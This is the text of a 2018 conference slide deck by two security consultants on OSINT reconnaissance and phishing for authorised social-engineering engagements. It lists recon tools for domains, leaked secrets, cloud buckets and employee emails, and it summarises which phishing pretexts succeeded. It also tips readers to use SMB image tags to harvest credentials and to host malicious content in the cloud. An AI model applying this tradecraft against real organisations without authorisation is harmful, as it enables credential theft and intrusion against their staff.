A Proven Methodology for Open-Source Intelligence Gathering and Social Engineering

SE-RI, June 16th 2018

Presented by Émilie St-Pierre and Robert Stewart

​

​

​

​

​

whoami - Émilie St-Pierre

• Security Analyst for Rapid7
• 5+ years in the infosec community
• Soft spot for SE, OSINT, and Privacy
• Twitter: @L4bF0x

whoami - Robert Stewart

• Security Consultant for Rapid7
• 7+ years in the infosec community
• Soft spot for SE, OSINT, and Physical Security
• Twitter: @RizzyRong

Overview

• OSINT Methodology for ESE
• Results: What Works? What Doesn’t Work?
• Tips and Tricks
• Free Phishing Templates!

Storytime!

Setting Clear Goals

Setting Goals

• What are you looking to measure/test?
• User behavior
• Infiltration
• Detection
• What type of data are you or your client expecting?
• Is this the first time, the n^th time?
• Will the engagement be reoccuring?
• Will you be integrating an educational component?
• Will multiple pretexts be used during an engagement?

OSINT Target Areas

• Technology
• People
• Presence
• Industry

Technology

People

Presence

Industry

Technology

Domain & Subdomain Enumeration

• https://appsecco.com/books/subdomain-enumeration/cheatsheets/techniques_cheatsheet.html
• https://github.com/ChrisTruncer/EyeWitness

​

Open services (passive search)

• https://www.shodan.io/search?query=weyland+industries
• https://censys.io/ipv4?q=weyland+industries

Technology

• Repositories + Secrets
• https://github.com/search?q=weyland+industries
• https://github.com/michenriksen/gitrob

​

• Searching through cloud storage : AWS, Azure, etc.
• https://github.com/jordanpotti/AWSBucketDump
• https://github.com/mwrlabs/Azurite

​

• What AV/Security appliance are they running?
• Job postings (if not in subdomains)

People

Employee Names, Emails and Titles:

• connect.data.com
• LinkedIn
• https://github.com/initstring/linkedin2username
• https://github.com/SimplySecurity/SimplyEmail

​

Customers:

• Google-Fu: “i am a customer of Weyland Industries” ...

Industry

Compliance & Regulations:

• https://law.justia.com/cfr/

​

Legal Cases

• https://dockets.justia.com/
• https://pcl.uscourts.gov/pcl/index.jsf ($)
• https://www.accessdata.fda.gov/scripts/warningletters/wlFilterByCompany.cfm

​

​

​

Presence

• Social Media:
• https://inteltechniques.com/menu.html
• Physical Locations
• Sensitive files
• https://github.com/leebaird/discover
• Searching for proprietary or unique terms

Storytime with Robby

Results

A Sampling of 60 Reports �from 2015 - 2018

Data points?

• Was OSINT Performed
• Number of Emails Discovered
• Number of Customer Provided
• Type of Pretext
• Logo/Signature in Pretext E-mail?
• Creds Compromised

​

​

OSINT

Types of Pretext

Let’s look at some Pretexts!

What Works

​

• Targeted salutations
• Using a domain similar to your target
• Using categorized domains
• Certificates
• Customized signatures

​

​

​

What Doesn’t Work (most of the time)

​

• Spoofing a domain that uses protections �(IE SPF, DKIM and DMARC)
• Overly-lengthy
• Non-customized signatures

What Works? - (Harvesting Credentials)

What Doesn’t Work? - (Harvesting Credentials)

What Works? - (Execute Payload)

What Doesn’t Work? - (Execute Payload)

SMB IMG Tags to Harvest Creds!!

​

Include it on Phishing emails to capture creds,

Include it on Landing pages to capture creds,

Include it on Everything!!

​

​

​

​

​

Other Tips and Tricks

1. Porfect grammerr
2. Using SSL + cert
3. Domain categorization
4. Connect with your inner marketer
5. Host malicious things in the cloud: AWS is your best friend

Free Pretexts

https://github.com/L4bF0x/PhishingPretexts

Free Pretexts!

Questions? �

Émilie St-Pierre

Emilie_St-Pierre@Rapid7.com

Twitter: @L4bF0x

Robert Stewart

Robert_Stewart@Rapid7.com

Twitter: @RizzyRong

​

Free Pretexts: https://github.com/L4bF0x/PhishingPretexts

Slides: https://goo.gl/U6qiiy